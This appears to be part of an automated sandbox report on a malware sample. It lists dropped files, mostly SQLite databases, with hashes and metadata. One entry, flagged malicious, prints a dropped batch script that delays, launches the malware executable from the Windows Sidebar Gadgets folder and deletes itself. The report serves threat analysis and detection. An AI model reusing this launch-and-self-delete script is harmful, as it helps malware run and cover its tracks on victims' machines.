                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):114688
                                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Users\user\Desktop\zZ1Y43bxxV.exe
                                                                                                                                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):201
                                                                                                                                                                  Entropy (8bit):5.406541704113936
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:hCRLuVFOOr+DER5SMLDVK/SKOZG1wkn23fDhkhn:CuVEOCDEfSMk/Iftkh
                                                                                                                                                                  MD5:68C5B1DF81CE4054D3A260D70B5B7519
                                                                                                                                                                  SHA1:D113EC3617A40929B7E494E8AA2E91CDB6C0EEC4
                                                                                                                                                                  SHA-256:A2346543692CBBCF01F963B45E17267D05D8DBE66354C3F7B5FD2D1557096BF9
                                                                                                                                                                  SHA-512:BBD4246593D7FA5AA23079AC9A6C9B5B4F654766FD4DF435EEF3AFC9B42B592660E568AC2792DDD50EACFE83EF25E00E5E7FDE9838537BD66E662797AA4FCA3F
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                  Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\QgDfm1tal9.bat"
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):159744
                                                                                                                                                                  Entropy (8bit):0.7873599747470391
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                  MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                  SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                  SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                  SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):126976
                                                                                                                                                                  Entropy (8bit):0.47147045728725767
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                  MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                  SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                  SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                  SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                  MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                  SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                  SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                  SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):2.5793180405395284
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                  MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                  SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                  SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                  SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                  Entropy (8bit):1.1358696453229276
                                                                                                                                                                  Encrypted:false
